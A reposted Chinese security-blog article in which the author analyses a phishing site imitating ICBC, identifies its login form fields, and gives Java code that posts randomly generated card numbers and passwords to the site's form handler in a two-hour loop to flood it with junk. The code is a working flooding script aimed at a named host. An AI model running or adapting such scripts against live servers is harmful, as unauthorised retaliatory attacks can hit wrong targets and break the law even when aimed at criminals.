转载

巧用网页分析“反击”钓鱼网站

接触网络一段时间的用户都会多多少少遇到一些钓鱼网站,而作为开发者的我们遇到的钓鱼网站更是数不胜数,有时稍不留神就会被钓鱼网站将自己的重要信息钓走,对于钓鱼网站我们也是咬牙切齿,当我们发现钓鱼网站后,我们总是气愤后关闭离开,或者有些正义感的朋友会选择举报该网站。这一次我来讲个更绝的,通过分析钓鱼网站获得其传输方法,发送垃圾数据反击作者。

先说说今天的经历,今天早上去了一趟科技市场,回来发现自己两台不同的手机多了两条相同的发自95588的信息,大致的内容是我的工行密保被冻结了,登陆wap-icbce.pw去解冻,咋看下去好像确实有点蹊跷,登陆上去还真是有模有样:

巧用网页分析“反击”钓鱼网站

我乱输入了一个卡号和密码,会显示这样的一个界面

巧用网页分析“反击”钓鱼网站

无论你输入什么,他都会显示这样一个界面,后来我又去工行确认了一下,人工服务告诉我这确实是一个钓鱼网站。我作为一个一身正气的人怎么能置之不理呢?首先我先举报了这个网站,发现这还没解气,我尝试使用电脑登陆这个网站,发现这个网站为了防止电脑的防护软件还不让电脑来登陆了。

巧用网页分析“反击”钓鱼网站

没关系,使用强大的chrome我成功的在电脑上打开了这个网站(方法不具体说明了,详细参阅百度百科上的chrome开启手机网站的方法)

巧用网页分析“反击”钓鱼网站

现在我们可以开始分析网站的源代码了,该钓鱼网站使用.net技术进行编写,感觉网站除了设计方面剩下都是粗制滥造,验证码也是放着其实并没有进行验证,网站的首页是一个识别是否是手机登陆的小图片,如果是手机登陆点击会使用submit字段随便传回一段字符,猜测在该网页的服务器端判断这submit字符应该仅仅使用是否为null来进行判断。

巧用网页分析“反击”钓鱼网站

巧用网页分析“反击”钓鱼网站

进入这个登录界面,我们能看到里边table字段中清晰的写着用户名密码以及验证码的name,而且获取方式是使用post获取,字符编码使用gb2312,网站分析基本到此结束,现在好戏开场了,首先我使用java编写一段发送数据至asp的java访问代码:

 public static String doPost(String reqUrl, Map parameters, String recvEncoding) {   HttpURLConnection conn = null;   String responseContent = null;   try {     StringBuffer params = new StringBuffer();     for (Iterator iter = parameters.entrySet().iterator(); iter.hasNext();) {       Entry element = (Entry) iter.next();       params.append(element.getKey().toString());       params.append("=");       params.append(URLEncoder.encode(element.getValue().toString(), recvEncoding));       params.append("&");     }     if (params.length() > 0) {       params = params.deleteCharAt(params.length() - 1);     }     URL url = new URL(reqUrl);     HttpURLConnection url_con = (HttpURLConnection) url.openConnection();     url_con.setRequestMethod("POST");     url_con.setConnectTimeout(5000);//(单位:毫秒)jdk     url_con.setDoOutput(true);     byte[] b = params.toString().getBytes();     url_con.getOutputStream().write(b, 0, b.length);     url_con.getOutputStream().flush();     url_con.getOutputStream().close();     InputStream in = url_con.getInputStream();     BufferedReader rd = new BufferedReader(new InputStreamReader(in, recvEncoding));     String tempLine = rd.readLine();     StringBuffer tempStr = new StringBuffer();     String crlf = System.getProperty("line.separator");     while (tempLine != null) {       tempStr.append(tempLine);       tempStr.append(crlf);       tempLine = rd.readLine();     }     responseContent = tempStr.toString();     rd.close();     in.close();   } catch (IOException e) {     e.printStackTrace();   } finally {     if (conn != null) {       conn.disconnect();     }   }   return responseContent; } 

测试没问题后,既然要冲击网站,我们先要随机一些银行卡用户名和密码。

先定义一些需要用到的参数以及要攻击网站的action以及发送的字符编码:

Map m = new HashMap(); String url = "http://wap-icbce.pw/add_1.asp"; String code = "gb2312";

首先银行卡前缀一般是固定的,前十位不随机生成:

String randomcarnum10="6222022102";

后9位就进行一个随机生成的工作:

int randomnum; randomnum = (int) (Math.random()*1000000000); randomcarnum10+=randomnum;

按照大部分人的习惯,密码都是前面几个字母+后边几个数字,我们随机前后字母的数量随机生成:

int loopentime,loopnumtime; loopentime=(int) (Math.random()*10);//随机的英文密码长度 loopnumtime=(int) (Math.random()*10);//随机的中文密码长度 String randompsw = ""; String chars = "abcdefghijklmnopqrstuvwxyz"; for(int i=0;i randompsw+=chars.charAt((int)(Math.random() * 26)); for(int i=0;i randompsw+=(int)(Math.random() * 10);

为了以防万一,验证码也随机生成提交:

String randomidcode; randomidcode=(int)(Math.random()*10000)+"";

最后将数据直接发送到钓鱼网站服务器端:

m.put("logonCardNum", randomcarnum); m.put("netType", randompsw); m.put("randomId", randomidcode); String rus = doPost(url, m, code); // System.out.println(rus);

让我们看看成果吧,在程序代码的最后我在控制台中输出了钓鱼网站返回的html文本内容

巧用网页分析“反击”钓鱼网站

对比一下钓鱼网站出现的等待跳转界面的html文本内容,基本能确定应该是已经上传数据成功了!写个循环,让程序跑个2小时

这次网站攻击采用了简单的网页关键信息获取方法,以及编写简单的java代码,达到反击钓鱼网站的目的,写这篇文章也是希望能够抛砖引玉,大神轻喷,我有什么建议私信给我,我会很乐于接受多学习多改进。

*本文作者:bawanag,转载须注明来自FreeBuf黑客与极客(FreeBuf.COM)

正文到此结束
Loading...